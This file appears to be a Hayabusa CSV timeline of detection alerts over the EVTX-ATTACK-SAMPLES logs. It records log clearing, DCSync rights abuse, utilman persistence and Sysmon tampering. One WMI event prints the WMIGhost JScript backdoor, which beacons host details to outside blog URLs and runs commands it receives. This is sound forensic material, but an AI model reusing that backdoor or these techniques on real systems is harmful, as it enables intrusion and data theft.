365ABB72-78D2-5C91-0000-0010FFAB0200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 
365ABB72-78EE-5C91-0000-0010273F0400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows 
Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx +2019-03-20 08:35:07.524 
+09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var 
MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var 
container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process 
Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: 
HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
